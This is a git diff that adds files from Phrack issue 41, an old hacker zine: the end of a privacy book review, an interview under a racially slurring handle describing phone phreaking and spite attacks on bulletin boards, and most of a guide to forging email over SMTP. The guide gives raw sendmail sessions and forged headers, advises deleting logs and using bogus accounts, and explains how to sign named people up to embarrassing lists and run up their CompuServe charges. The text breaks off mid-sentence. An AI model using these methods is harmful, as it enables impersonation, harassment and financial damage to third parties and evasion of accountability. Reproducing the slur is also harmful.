+which gather, sift and repackage such information.  Indeed, a critical juncture
+has now been reached where the basic constitutional rights of privacy and
+expression are colliding with the ever-expanding reach of modern technology.
+
+Two well-crafted books have recently been published which together frame the
+spectrum of relevant individual rights issues in these areas with uncanny
+symmetry.  Fortunately, neither degenerates into a "computers are bad"
+jeremiad.  Rather, they portray an appropriate balance between the virtues of
+computerization and disturbing cases of technological misuse for wrongful
+commercial and governmental ends.
+
+Presenting array of new forms of electronic encroachment on personal privacy is
+Jeffrey Rothfeder's alarming new book, "Privacy for Sale: How Computerization
+Has Made Everyone's Private Life an Open Secret" (Simon & Schuster, 224 pages,
+$22).  He offers the chilling thesis that anyone can find out nearly anything
+regarding anybody and there is nowhere left to hide.  He convincingly states
+his case in a concise and insightful exploration of the trends and abuses in
+the mass processing of personal data.
+
+The fascinating mechanics of how and where information about virtually every
+aspect of our lives is gathered and then computerized are extensively
+described.  The most productive fonts include medical records, credit
+histories, mortgage applications, subscription lists, phone records, driver's
+licenses and insurance forms.  Yet notwithstanding the legitimate commercial
+and regulatory reasons for providing these facts, the author carefully
+documents another more deeply hidden and troubling consequence of volunteering
+such information: It is constantly resold, combined with other sources and
+reused without your knowledge or permission for purposes entirely different
+from those you first intended.
+
+Mr. Rothfeder alleges the most perilous result of these activities is the
+growing and highly organized sales, integration and cross-matching of
+databases.  Businesses and government entities now have sophisticated software
+to generate complex demographic profiles about individuals, populations and
+geographic areas.  In turn, these computer-generated syntheses are increasingly
+used for invasive and discriminatory purposes.
+
+Numerous examples of such misuse are cited, ranging from slightly annoying to
+purely horrifying.  The astonishing breadth of this roster includes the sale of
+driver's license information with height weight specifications to clothes
+marketers for tall men and thin women, purchases of credit histories and
+workmen's compensation claims reports by prospective employers who believe this
+material is indicative of a job applicant's character, and the creation of
+"propensity files" by federal agencies to identify people who have not
+committed any offense but might likely be criminals.
+
+Two additional problems pervade the trafficking of intimate information.
+First, there is little or no federal legislation to effectively protect people
+from certain problems presented in the book.  For example, the release of
+medical records thought to be "confidential" is virtually unprotected.
+
+Second, it can be extremely difficult to have false entries corrected before
+they have a ripple effect on your other data.  Beyond the common tales of
+frustration at clearing up a faulty credit report, Mr. Rothfeder relates the
+case of a man denied any health insurance because his medical records contained
+an erroneous report he was HIV positive.
+
+
+JOURNEY IN CYBERSPACE
+
+Turning to a much more accurate account, author Bruce Sterling takes readers
+into the ethereal realm of "cyberspace" where computers, networks, and
+electronic bulletin boards systems (BBS) are linked together by phone.  In his
+first non-fiction work, "The Hacker Crackdown: Law and Disorder on the
+Electronic Frontier" (Bantam, 328 pages, $23), he chronicles the U.S.
+government's highly visible efforts in 1990 to prosecute "hackers" it suspected
+of committing crimes by PC and modem.  However, Mr. Sterling distinguishes this
+term as being more about active computer enthusiasts, most of whom have never
+committed any wrongdoing.  The writer's other credits include some highly
+regarded "cyberpunk" science fiction, where computer technology is central to
+the plots and characters.
+
+The "crackdown" detailed by the author began with the crash of AT&T's long-
+distance phone system on January 15, 1990.  Although it has never been proven
+that hackers were responsible, this event served as the final catalyst to spur
+federal law enforcement agencies into concerted action against a suspected
+underground of computer criminals.  A variety of counter-operations were
+executed.  Most notable was Operation Sundevil the following May when agents
+around the country seized 42 computer systems, 23,000 diskettes, and halted 25
+BBS's where the government believed hackers were exchanging tips of the trade.
+
+Some of the government's resulting prosecutions through their nationwide
+efforts were moderately successful. However, the book's dramatic centerpiece is
+the trial of Craig Neidorf (a.k.a. Knight Lightning).  Mr. Neidorf was a
+contributor to Phrack, an electronic magazine catering to hackers, available on
+various BBS's.
+
+In January 1989, another hacker named "Prophet" transmitted a document he
+pilfered from BellSouth's computers regarding the 911 emergency system to
+Neidorf.  Together they edited the text, which Neidorf then published in
+Phrack.  In July 1990, he was placed on trial for federal charges of entering a
+fraudulent scheme with Prophet to steal this document.  The government alleged
+it was worth $79,499 and that its publication threatened emergency operations.
+To the prosecutor's dismay, the case was dropped when the defense proved the
+same material was publicly available for only $13.
+
+With insight and style, Mr. Sterling uses this and other events to cast
+intriguing new spins on applicable civil liberties issues.
+
+Are the constitutional guarantees of freedom of expression and assembly fully
+extended to BBS dialogs and gatherings?  What degree of privacy can be expected
+for personal data on systems which may be subject to surreptitious entry?  Are
+hackers really breaking any laws when merely exploring new systems?  Is posting
+a message or document on a BBS considered a "publication"?  Should all BBS's be
+monitored just because of their potential for illegal activity?  What are the
+responsibilities of BBS operators for the contents of, and access to, their
+systems?
+
+The efforts of Mitchell Kapor, the co-developer of Lotus 123 and now chairman
+of ONtechnology, are depicted as a direct response to such issues raised by the
+crackdown.  Mr. Kapor assembled a prominent group of fellow computer
+professionals to establish the Electronic Frontier Foundation (EFF), dedicated
+to education and lobbying for free speech and expression in electronic media.
+As well, EFF has provided support to Craig Neidorf and others they consider
+wrongly charged with computer crime.
+
+Weighty legal matters aside, the author also embellishes his story with some
+colorful hacker lore.  These denizens of cyberspace are mostly young men in
+their late teens or early twenties, often fueled by junk food and propelled by
+macho.  Perhaps their most amusing trait is the monikers they adopt --
+Bloodaxe, Shadowhawk, and of course, Phiber Optik.
+
+Someone else, a non-hacker involuntary given the pseudonym "Number 6," knew his
+every act was continually being monitored and recorded against his will.  As a
+manifestation of resistance to this relentless surveillance, he often bid
+farewell to other citizens of the Village with a sarcastic "Be seeing you."
+Today, the offerings of authors Rothfeder and Sterling provide a resounding
+"And you" as a form of rejoinder (often uttered by The Village's citizens as
+well), to publicize the ironic diversity threats wrought by information
+technology.
+
+Number 6 cleverly managed to escape his fictional captivity in The Village
+during the final (and mind-boggling) episode of The Prisoner.  However, based
+on the compelling evidence presented in these two books, the protection of
+individual rights in the reality of today's evolving "global village" of
+computer networks and telecommunications may not be so neatly resolved.
diff --git a/phrack41/3.txt b/phrack41/3.txt
new file mode 100644
index 0000000..0febd91
--- /dev/null
+++ b/phrack41/3.txt
@@ -0,0 +1,208 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 3 of 13
+
+                              ==Phrack Pro-Phile==
+
+                          Created by Taran King (1986)
+
+_______________________________________________________________________________
+
+     Welcome to Phrack Pro-Phile.  Phrack Pro-Phile is created to bring info to
+you, the users, about old or highly important/controversial people.  This
+month, we bring to you certainly one of the most controversial people (and
+handles) to ever emerge in the computer underground...
+
+                                  Supernigger
+                                  ~~~~~~~~~~~
+_______________________________________________________________________________
+
+ Personal
+ ~~~~~~~~
+           Handle:  Supernigger
+         Call him:  SN
+    Date of Birth:  Years ago
+              Age:  Getting along in the years.
+           Height:  Medium
+           Weight:  Medium
+  Computers owned:  Commodore Vic-20, C64, Amiga, 386 Compatible
+
+     How did this handle originate?  Back in 1985, I had blueboxed to a bridge.
+Someone on there, for some reason, decided that he didn't like me, and shouted,
+"Get off, nigger!"  He then proceeded to knock me off with a 2600 Hz tone.  I
+immediately called back with something "un-2600 hz-able" and, when he shouted,
+"Get off nigger!" and blew 2600 hz, I then said, "I'm SUPERnigger, you can't
+knock me off, I've got the POWER!!"  Fun, eh?
+
+
+ How I Got Started
+ ~~~~~~~~~~~~~~~~~
+     Back in '82 or '83, I got a wonderful computer called a Commodore Vic-20.
+With that, I wrote a few irrelevant programs and played "Gorf!" a lot.  Then, a
+friend suggested that I get a Commodore C-64 and disk drive for all the RAD
+WhErEz! it had.
+
+       Needless to say, I was not disappointed.  Then a friend showed me a
+5-digit number you could put in after calling an access number, and it would
+put a call through for you!  Imagine that!  This, I thought, was the key to
+UNLIMITED WARES!
+
+     Then, the new ware scene became tiresome and boring REAL quick.  I had
+them all.  New ones.  Old ones.  Middle-aged ones.  I had wares coming out of
+my ass.  Just when I was about to drop out of the scene, I saw a number posted
+on a board for InterCHAT (201), a multi-line chat system.
+
+     That's where the cavalcade of fun and interesting endeavors began.  That's
+where I met Sharp Remob, Lord_foul (DP), Dark Wanderer and other members of
+DPAK.
+
+     Speaking of DPAK, the group was created when we found a glitch in the MCI
+access # that allowed any 14-digit code to work.  We then made up the joke,
+"Today at 2:00 PM, DPAK Agents cornered an MCI official and said, 'You WILL
+give these people free calls!'" and proceeded to tell people about the glitch
+("DPAK" came from Mad Hacker 312, who, when asked about obtaining non-published
+numbers, said, "Oh, you'd have to be a DPAK Agent to get that.").
+
+     After that, DPAK was tracing people before Caller ID came out, finding and
+creating bridges, setting up an 800 # for InterCHAT (actually 2 if you were
+quick enough to catch the second one), putting out Sharp Remob's Social
+Engineering file, and other things that I had better not mention (I would go
+on, but I think I might frighten you.).
+
+     I would have to say that I feel negatively toward "elite posers," people
+who claim to know things with the sole purpose of trying to seem "cool."  These
+are the people you see boasting about how long they have been around (which is
+irrelevant), spurting out random acronyms when they have no idea how they are
+actually used, and trying to make something complicated and mysterious out of
+something mundane and simple.  For example:  "Hey dude, watch out, I may be
+listening in on your line right now with a DAMT," or "Oh, I'll just use the DRT
+trunk multiplexor to do a Random Interphase-seizure of the tandemized trunk."
+(Barf!)
+
+     Also, I think this government crackdown really sucks.  What sucks is the
+fact that the government is going after big NAMES instead of big -CRIMES-.
+Rather than stopping crimes, they just want to "show who's boss."  A lot of
+innocent lives are being ruined.  In fact, after this issue of Phrack comes
+out, I plan to lay VERY low because they will probably want to get me now that
+my handle was in a phreak/hack publication.
+
+
+ Interests
+ ~~~~~~~~~
+
+              Women:  Fast
+               Cars:  Fast (VWs)
+               Food:  Fast
+              Music:  All kinds (Rap, Rock, Metal, you name it)
+Favorite performers:  2 Live Crew
+    Favorite author:  Lord Digital (the father of ELITE!ness)
+      Favorite Book:  Nat!onal Enl!ghtener
+
+
+ Most Memorable Experiences
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+     "It works!  It works!!" -- when the 800 # for InterCHAT actually worked.
+If you called it, you remember.  That took a lot of work...
+
+     Also, at one point in time, every chat system in New Jersey was forwarded
+to InterCHAT..  That was truly hilarious.  I strongly suggest, at this point,
+that everyone refrain from attempting these things.  The consequences are a bit
+more serious now.  But if you must, be VERY very careful.
+
+     ...And, I would like to take this opportunity to clear up the "Free World
+II Incident" and other vague and unclear statements chronicled in Phrack 28.
+First of all, I -DID NOT- crash Black Ice BBS.  In fact, some hick from Texas
+already stated to me that he wrote my name on the BBS when it was crashed.  The
+same hick tends to lie and spread rumors a lot, so I don't actually know if it
+was him that wrote my name.  Suffice to say that I didn't crash it.
+
+     Secondly, and most important, Free World II BBS was forwarded to InterCHAT
+because Major Havoc was a complete and total ASSHOLE.
+
+     I called his system and applied for access.  When I tried to get back on,
+I found that my application had been deleted without so much as a notification,
+so I thought that the BBS hadn't saved it correctly and applied again.  I found
+the BBS hadn't saved it correctly a second time, and when I tried to fill out
+the application once more, Major Havoc broke in and typed things like "Get the
+fuck off here" and "Hang the fuck up."  I typed "Fine, have it your way" and
+proceeded to forward his BBS # to InterCHAT.  You can't just treat people like
+that and expect nothing to happen.
+
+     The opening message on InterCHAT said:  "Until Major Havoc learns the
+meaning of the word TACT (dealing with people in a non-offensive manner), his
+BBS has been put to better use."
+
+     (I had called the BBS in the first place to try to clear up wild rumors
+that The Blade had said were being tossed about on there).
+
+     I hope this has cleared things up.
+
+
+ Some People To Mention
+ ~~~~~~~~~~~~~~~~~~~~~~
+
+Sharp Remob :       He showed me the wonders of Social Engineering.  He is
+                    making the big dollars now.
+
+Lord_foul :         I never realized how many people he was in contact with.
+                    Some pretty heavy hitters.  He never let on how much he
+                    knew.
+
+Applehead :         The best DJ in the phreak/hack world.  Truly, in mixing
+                    records, no one is his equal.  Seems to be able to
+                    mesmerize phone company employees into doing his bidding as
+                    well.  Could these two things be related?
+
+Meat Puppet :       "Money for nuthin, EVERYTHING for free."  Why anyone would
+                    want 800 watts in their car I will never know.
+
+Lung C00kiez :      He had the best conference ideas, like Want-Ad Fun and
+                    Operator Frenzy.
+
+*DETH*-2-*J00Z* :   So much for political correctness.  First person I know to
+                    theorize how to trace people before Caller ID came out.
+
+Dark Wanderer :     Works for Sun Microsystems now.  One of the few hackers I
+                    know that has a technical computer-oriented career.
+
+Krak Dealer :       Takes consciousness-altering to the level of an art form.
+
+Squashed Pumpkin :  The enforcer.
+
+DeeDee :            The only cool bridge chick.
+
+Dr. Mike :          Cool guy when he's not threatening his girlfriend with a
+                    knife.
+
+Gatsby :            Gets the award for quick learner.
+
+orpheus :           One of the true devotees of InterCHAT, and one of the few
+                    people I know who is actually interested in HP-3000.
+
+The whole InterCHAT crowd...  Made modeming fun.
+
+     I should also mention a group of NYC individuals at this time.  I would
+mention their names, but certain legal situations preclude that.  They showed
+me what someone can REALLY do with an in-depth understanding of many systems.
+
+     Suffice to say that they are the creme de la creme, probably the only
+group up to par with DPAK.
+
+     Oh, and I cannot, I MUST NOT forget to mention The Blade, who is truly a
+legend in his own mind.
+
+
+ The Future
+ ~~~~~~~~~~
+     I see the future for hacking/phreaking as pretty bleak.  Big Brother is
+watching.  System Administrators are finally realizing that it is better to
+make your system impenetrable than to prosecute kids (I wish the government
+would realize this).  If you combine these two things, there is not much to
+look forward to.
+
+ In Closing...
+ ~~~~~~~~~~~~~
+     As for the standard Pro-Phile question (are most of the phreaks and
+hackers that I've met computer geeks?), I have not met any phreakers or
+hackers, so I can't say if they are geeks or not.  From phone conversations,
+some seem like geeks, some don't.
diff --git a/phrack41/4.txt b/phrack41/4.txt
new file mode 100644
index 0000000..2c13446
--- /dev/null
+++ b/phrack41/4.txt
@@ -0,0 +1,746 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 4 of 13
+
+                               Network Miscellany
+            *******************************************************
+           <              The POWER of Electronic Mail             >
+            *******************************************************
+                         Compiled from Internet Sources
+
+                                by The Racketeer
+                              of The Hellfire Club
+
+                    Network Miscellany created by Taran King
+
+
+     First of all, this guide is more than using fakemail.  It literally
+explains the interfaces used with SMTP in detail enough that you should gain a
+stronger awareness of what is going on across the multitude of networks which
+make up the worldwide e-mail connections.  It also contains my usual crude
+remarks and grim hacker humor (assuming it hasn't again been edited out, but
+I'm somewhat proud of the fact that Phrack heavily edited my "language" in last
+issue's article.  Oh well.).
+
+     There are two objectives in this file:  first, I will attempt to show that
+by using fakemail and SMTP, you can cause an amazing number of useful, hacker
+related stunts; second, I shall attempt to be the first hacker to ever send a
+piece of electronic mail completely around the world, ushering in a new age of
+computerdom!
+
+     I suggest that, unless you don't want everyone lynching you, don't try to
+fuck up anything that can't be repaired offhand.  I've experimented with
+fakemail beyond this article and the results were both impressive and
+disastrous.  Therefore, let's examine risks first, and then go onto the good
+stuff.  Basic philosophy -- use your brain if you've got one.
+
+
+RISKS:
+
+     Getting caught doing this can be labeled as computer vandalism; it may
+violate trespassing laws; it probably violates hundreds of NFS, Bitnet and
+private company guidelines and ethics policies; and finally, it will no doubt
+piss someone off to the point of intended revenge.
+
+     Networks have fairly good tracing abilities.  If you are logged, your host
+may be disconnected due to disciplinary referral by network authorities (I
+don't think this has happened yet).  Your account will almost definitely be
+taken away, and if you are a member of the source or target computer's
+company/organization, you can expect to face some sort of political shit that
+could result in suspension, expulsion, firing, or otherwise getting the short
+end of the stick for awhile.
+
+     Finally, if the government catches you attempting to vandalize another
+computer system, you will probably get some sort of heavy fine, community
+service, or both.
+
+     Odds of any of this happening if you are smart:  < 1%.
+
+
+PRECAUTIONS SUGGESTED:
+
+     If you have a bogus computer account (standard issue hacker necessity)
+then for crissake use that.  Don't let "them" know who really is hacking
+around.  (Point of clarification, I refer to "them" an awful lot in RL and in
+philes.  "They" are the boneheadded "do-gooders" who try to blame their own
+lack of productivity or creativity on your committing of pseudo-crimes with a
+computer.  FBI, SS, administrators, accountants, SPA "Don't Copy that Floppy"
+fucks, religious quacks, stupid rednecks, right wing conservative Republican
+activists, pigs, NSA, politicians who still THINK they can control us, city
+officials, judges, lame jurors that think a "hacker" only gets
+slap-in-the-wrist punishments, lobbyists who want to blame their own failed
+software on kids, bankers, investors, and probably every last appalled person
+in Stifino's Italian Restaurant when the Colorado 2600 meeting was held there
+last month.  Enough of the paranoid Illuminati shit, back to the phile.)
+
+     Make sure that you delete history files, logs, etc. if you have
+access to them.  Try using computers that don't keep logs.  Check /usr/adm,
+/etc/logs to see what logs are kept.
+
+     If you can avoid using your local host (since you value network
+connections in general), do so.  It can avert suspicion that your host contains
+"hackers."
+
+
+IF YOU EVER ARE CONFRONTED:
+
+     "They must have broken into that account from some other site!"
+
+     "Hackers?  Around here?  I never check 'who' when I log in."
+
+     "They could have been super-user -- keep an eye out to see if the scum
+      comes back."
+
+     "Come on, they are probably making a big deal out of nothing.  What could
+      be in e-mail that would be so bad?"
+
+     "Just delete the account and the culprit will be in your office tomorrow
+      morning."   (Of course, you used a bogus account.)
+
+
+PART ONE:  ELECTRONIC MAIL
+
+     Basically, electronic mail has become the new medium of choice for
+delivering thoughts in a hurry.  It is faster than the post office, cheaper
+than the post office, doesn't take vacations all the time like the post office,
+and is completely free so it doesn't have unions.
+
+     Of course, you know all that and would rather spend this time making damn
+sure you know what SMTP is.
+
+     To my knowledge, a completely accurate SMTP set of protocols hasn't been
+published in any hacker journal.  The original (at least, the first I've seen)
+was published in the Legion of Doom Technical Journals and covered the minimum
+SMTP steps necessary for the program "sendmail," found in a typical Unix
+software package.
+
+     When you connect a raw socket to a remote SMTP compatible host, your
+computer is expected to give a set of commands which will result in having the
+sender, receiver, and message being transferred.  However, unlike people who
+prefer the speed of compression and security of raw integer data, the folks at
+DARPA decided that SMTP would be pretty close to English.
+
+     If you are on the Internet, and you wanted to connect to the SMTP server,
+type:
+
+       telnet <hostname> 25
+
+     Port 25 is the standard port for SMTP.  I doubt it would be too cool to
+change this, since many mail servers connect to the target hosts directly.
+
+[Editor's Note:  All mail and SMTP commands have been offset by a ">" at the
+ beginning of each line in order not to confuse Internet mailers when sending
+ this article through e-mail.]
+
+     When you connect, you will get a small hostname identifier for whatever
+SMTP server revision you've got.
+
+220 huggies.colorado.edu Sendmail 2.2/2.5 8/01/88 ready at Tue, 25 Aug 91
+03:14:55 edt
+
+     Now that you are connected, the computer is waiting for commands.  First
+of all, you are expected to explain which computer you are calling in from.
+This is done with the HELO <host> command.  This can be anything at all, but if
+you fail to give the exact host that you are connecting from, it causes the
+following line to appear on the e-mail message the recipient gets from you:
+
+> Apparently-to:  The Racketeer <rack@lycaeum.hfc.com>
+
+     Instead of the classic:
+
+> To:  The Racketeer <rack@lycaeum.hfc.com>
+
+     This is the secret to great fakemail -- the ability to avoid the
+"apparently-to" flag.  Although it is subtle, it is a pain to avoid.  In fact,
+in some places, there are so many "protections" to SMTP that every outside
+e-mail is marked with "Apparently-to."  Hey, their problem.
+
+     So, go ahead and type the HELO command:
+
+> HELO LYCAEUM.HFC.COM
+
+The computer replies:
+
+250 huggies.colorado.edu Hello LYCAEUM.HFC.COM, pleased to meet you
+
+    Oh, a warm reception.  Older sendmail software explains with the HELP
+command that the computer doesn't care about HELO commands.  You can check it
+upon login with the command "HELP HELO."
+
+    Now what you will need to do is tell the computer who is supposed to get
+the letter.  From this point, there are all sorts of possibilities.  First of
+all, the format for the recipient would be:
+
+> RCPT TO: <name@host>
+
+    And *NOTE*, the "<" and ">" symbols should be present!  Some computers,
+especially sticklers like Prime, won't even accept the letters unless they
+adhere specifically to the protocol!  Now, if you give a local address name,
+such as:
+
+> RCPT TO: <smith>
+
+    ...then it will treat the mail as if it were sent locally, even though it
+was sent through the Internet.  Giving a computer its own host name is valid,
+although there is a chance that it will claim that the machine you are calling
+from had something to do with it.
+
+> RCPT TO: <smith@thishost>
+
+    ...will check to see if there is a "smith" at this particular computer.  If
+the computer finds "smith," then it will tell you there is no problem.  If you
+decide to use this computer as a forwarding host (between two other points),
+you can type:
+
+> RCPT TO: <smith@someotherhost>
+
+     This will cause the mail to be forwarded to someotherhost's SMTP port and
+the letter will no longer be a problem for you.  I'll be using this trick to
+send my letter around the world.
+
+     Now, after you have given the name of the person who is to receive the
+letter, you have to tell the computer who is sending it.
+
+> MAIL FROM: <rack@lycaeum.hfc.com>      ; Really from
+> MAIL FROM: <rack>                      ; Localhost
+> MAIL FROM: <rack@osi.mil>              ; Fake -- "3rd party host"
+> MAIL FROM: <lycaeum.hfc.com|rack>      ; UUCP Path
+
+     Essentially, if you claim the letter is from a "3rd party," then the other
+machine will accept it due to UUCP style routing.  This will be explained later
+on.
+
+     The next step is actually entering the e-mail message.  The first few
+lines of each message consists of the message title, X-Messages, headers,
+Forwarding Lines, etc.  These are completely up to the individual mail program,
+but a few simple standards will be printed later, but first let's run through
+the step-by-step way to send fakemail.  You type anything that isn't preceded
+by a number.
+
+220 hal.gnu.ai.mit.edu Sendmail AIX 3.2/UCB 5.64/4.0 ready at Tue, 21 Jul 1992
+22:15:03 -0400
+> helo lycaeum.hfc.com
+250 hal.gnu.ai.mit.edu Hello lycaeum.hfc.com, pleased to meet you
+> mail from: <rack@lycaeum.hfc.com>
+250 <rack@lycaeum.hfc.com>... Sender ok
+> rcpt to: <phrack@gnu.ai.mit.edu>
+250 <phrack@gnu.ai.mit.edu>... Recipient ok
+> data
+354 Enter mail, end with "." on a line by itself
+> Yo, C.D. -- mind letting me use this account?
+> .
+250 Ok
+> quit
+
+     Now, here are a few more advanced ways of using sendmail.  First of all,
+there is the VRFY command.  You can use this for two basic things:  checking up
+on a single user or checking up on a list of users.  Anyone with basic
+knowledge of ANY of the major computer networks knows that there are mailing
+lists which allow several people to share mail.  You can use the VRFY command
+to view every member on the entire list.
+
+> vrfy phrack
+250 Phrack Classic <phrack>
+
+     Or, to see everyone on a mailing list:
+
+> vrfy phrack-staff-list
+250 Knight Lightning <kl@stormking.com>
+250 Dispater <dispater@stormking.com>
+
+     Note - this isn't the same thing as a LISTSERV -- like the one that
+distributes Phrack.  LISTSERVs themselves are quite powerful tools because they
+allow people to sign on and off of lists without human moderation.  Alias lists
+are a serious problem to moderate effectively.
+
+     This can be useful to just check to see if an account exists.  It can be
+helpful if you suspect a machine has a hacked finger daemon or something to
+hide the user's identity.  Getting a list of users from mailing lists doesn't
+have a great deal of uses, but if you are trying very hard to learn someone's
+real identity, and you suspect they are signed up to a list, just check for all
+users from that particular host site and see if there are any matches.
+
+     Finally, there is one last section to e-mail -- the actual message itself.
+In fact, this is the most important area to concentrate on in order to avoid
+the infamous "Apparently-to:" line.  Basically, the data consists of a few
+lines of title information and then the actual message follows.
+
+     There is a set of guidelines you must follow in order for the quotes to
+appear in correct order.  You won't want to have a space separate your titles
+from your name, for example.  Here is an example of a real e-mail message:
+
+> From: rack@lycaeum.hfc.com
+> Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
+> 12:00:00
+> Message-Id: <666.AA10000@dockmaster.ncsc.mil>
+> To: RMorris@dockmaster.ncsc.mil
+> Date: Thu, 06 Feb 92 12:00:00
+> Title: *wave* Hello, No Such Agency dude!
+>
+> NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
+
+    Likewise, if you try to create a message without an information line, your
+message would look something like this:
+
+> From: rack@lycaeum.hfc.com
+> Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
+> 12:00:00 -0500
+> Message-Id: <666.AA10000@dockmaster.ncsc.mil>
+> Date: Thu, 06 Feb 92 12:00:00
+> Apparently-to: RMorris@dockmaster.ncsc.mil
+
+> NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
+
+     Basically, this looks pretty obvious that it's fakemail, not because I
+altered the numbers necessarily, but because it doesn't have a title line, it
+doesn't have the "Date:" in the right place, and because the "Apparently-to:"
+designation was on.
+
+    To create the "realistic" e-mail, you would enter:
+
+> helo lycaeum.hfc.com
+> mail from: <rack@lycaeum.hfc.com>
+> rcpt to: <RMorris@docmaster.ncsc.mil>
+> data
+> To:  RMorris@dockmaster.ncsc.mil>
+> Date: Thu, 06 Feb 92 12:00:00
+> Title: *wave* Hello, No Such Agency dude!
+>
+> NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
+> .
+
+     Notice that, even though you are in "data" mode, you are still giving
+commands to sendmail.  All of the lines can (even if only partially) be altered
+through the data command.  This is perfect for sending good fakemail.  For
+example:
+
+> helo lycaeum.hfc.com
+> mail from: <dale@opus.tymnet.com>
+> rcpt to: <listserv@brownvm.brown.edu>
+> data
+> Received: by lycaeum.hfc.com (5.12/3.7) id AA11891; Thu 6 Feb 92 12:00:00
+> Message-Id: <230.AA11891@lycaeum.hfc.com>
+> To: <listserv@brownvm.brown.edu>
+> Date: Thu, 06 Feb 92 12:00:00
+> Title:  Ohh, sign me up Puuuleeeze.
+>
+> subscribe BISEXU-L Dale "Fist Me" Drew
+> .
+
+     Now, according to this e-mail path, you are telling the other computer
+that you received this letter from OPUS.TYMNET.COM, and it is being forwarded
+by your machine to BROWNVM.BROWN.EDU.  Basically, you are stepping into the
+middle of the line and claiming you've been waiting there all this time.  This
+is a legit method of sending e-mail!
+
+     Originally, when sendmail was less automated, you had to list every
+computer that your mail had to move between in order for it to arrive.  If you
+were computer ALPHA, you'd have to send e-mail to account "joe" on computer
+GAMMA by this address:
+
+> mail to: <beta!ceti!delta!epsilon!freddy!gamma!joe>
+
+     Notice that the account name goes last and the host names "lead" up to
+that account.  The e-mail will be routed directly to each machine until it
+finally reaches GAMMA.  This is still required today, especially between
+networks like Internet and Bitnet -- where certain hosts are capable of sending
+mail between networks.  This particular style of sending e-mail is called "UUCP
+Style" routing.
+
+     Sometimes, hosts will use the forwarding UUCP style mail addresses in case
+the host has no concept of how to deal with a name address.  Your machine
+simply routes the e-mail to a second host which is capable of resolving the
+rest of the name.  Although these machines are going out of style, they still
+exist.
+
+     The third reasonable case of where e-mail will be routed between hosts is
+when, instead of having each computer waste individual time dealing with each
+piece of e-mail that comes about, the computer gives the mail to a dedicated
+mailserver which will then deliver the mail.  This is quite common all over the
+network -- especially due to the fact that the Internet is only a few T1 lines
+in comparison to the multitude of 9600 and 14.4K baud modems that everyone is
+so protective of people over-using.  Of course, this doesn't cause the address
+to be in UUCP format, but when it reaches the other end of the network, it'll
+be impossible to tell what method the letter used to get sent.
+
+     Okay, now we can send fairly reasonable electronic fakemail.  This stuff
+can't easily be distinguished between regular e-mail unless you either really
+botched it up (say, sending fakemail between two people on the same machine by
+way of 4 national hosts or something) or really had bad timing.
+
+     Let's now discuss the POWER of fakemail.  Fakemail itself is basically a
+great way to fool people into thinking you are someone else.  You could try to
+social engineer information out of people on a machine by fakemail, but at the
+same time, why not just hack the root password and use "root" to do it?  This
+way you can get the reply to the mail as well.  It doesn't seem reasonable to
+social engineer anything while you are root either.  Who knows.  Maybe a really
+great opportunity will pop up some day -- but until then, let's forget about
+dealing person-to-person with fakemail, and instead deal with
+person-to-machine.
+
+     There are many places on the Internet that respond to received electronic
+mail automatically.  You have all of the Archie sites that will respond, all of
+the Internet/Bitnet LISTSERVs, and Bitmail FTP servers.  Actually, there are
+several other servers, too, such as the diplomacy adjudicator.  Unfortunately,
+this isn't anywhere nearly as annoying as what you can do with other servers.
+
+     First, let's cover LISTSERVs.  As you saw above, I created a fakemail
+message that would sign up Mr. Dale Drew to the BISEXU-L LISTSERV.  This means
+that any of the "netnews" regarding bisexual behavior on the Internet would be
+sent directly to his mailbox.  He would be on this list (which is public and
+accessible by anyone) and likewise be assumed to be a member of the network
+bisexual community.
+
+     This fakemail message would go all the way to the LISTSERV, it would
+register Mr. Dictator for the BISEXU-L list, >DISCARD< my message, and, because
+it thinks that Dale Drew sent the message, it will go ahead and sign him up to
+receive all the bisexual information on the network.
+
+     And people wonder why I don't even give out my e-mail address.
+
+     The complete list of all groups on the Internet is available in the file
+"list_of_lists" which is available almost everywhere so poke around
+wuarchive.wustl.edu or ftp.uu.net until you find it.  You'll notice that there
+are several groups that are quite fanatic and would freak out nearly anybody
+who was suddenly signed up to one.
+
+     Ever notice how big mega-companies like IBM squelch little people who try
+to make copies of their ideas?  Even though you cannot "patent" an "idea,"
+folks like IBM want you to believe they can.  They send their "brute" squad of
+cheap lawyers to "legal-fee-to-death" small firms.  If you wanted to
+"nickel-and-dime" someone out of existence, try considering the following:
+
+     CompuServe is now taking electronic mail from the Internet.  This is good.
+CompuServe charges for wasting too much of their drive space with stored
+e-mail.  This is bad.  You can really freak out someone you don't like on
+CompuServe by signing them up to the Dungeons and Dragons list, complete with
+several megabytes of fluff per day.  This is cool.  They will then get charged
+hefty fines by CompuServe.  That is fucked up.  How the hell could they know?
+
+    CompuServe e-mail addresses are userid@compuserve.com, but as the Internet
+users realize, they can't send commas (",") as e-mail paths.  Therefore, use a
+period in place of every comma.  If your e-mail address was 767,04821 on
+CompuServe then it would be 767.04821 for the Internet. CompuServe tends to
+"chop" most of the message headers that Internet creates out of the mail before
+it reaches the end user.  This makes them particularly vulnerable to fakemail.
+
+     You'll have to check with your individual pay services, but I believe such
+groups as MCI Mail also have time limitations.  Your typical non-Internet-
+knowing schmuck would never figure out how to sign off of some God-awful fluff
+contained LISTSERV such as the Advanced Dungeons & Dragons list.  The amount of
+damage you could cause in monetary value alone to an account would be
+horrendous.
+
+     Some groups charge for connection time to the Internet -- admittedly, the
+fees are reasonable -- I've seen the price at about $2 per hour for
+communications.  However, late at night, you could cause massive e-mail traffic
+on some poor sap's line that they might not catch.  They don't have a way to
+shut this off, so they are basically screwed.  Be WARY, though -- this sabotage
+could land you in deep shit.  It isn't actually fraud, but it could be
+considered "unauthorized usage of equipment" and could get you a serious fine.
+However, if you are good enough, you won't get caught and the poor fucks will
+have to pay the fees themselves!
+
+     Now let's investigate short-term VOLUME damage to an e-mail address.
+There are several anonymous FTP sites that exist out there with a service known
+as BIT FTP.  This means that a user from Bitnet, or one who just has e-mail and
+no other network services, can still download files off of an FTP site.  The
+"help" file on this is stored in Appendix C, regarding the usage of Digital's
+FTP mail server.
+
+     Basically, if you wanted to fool the FTP Mail Server into bombarding some
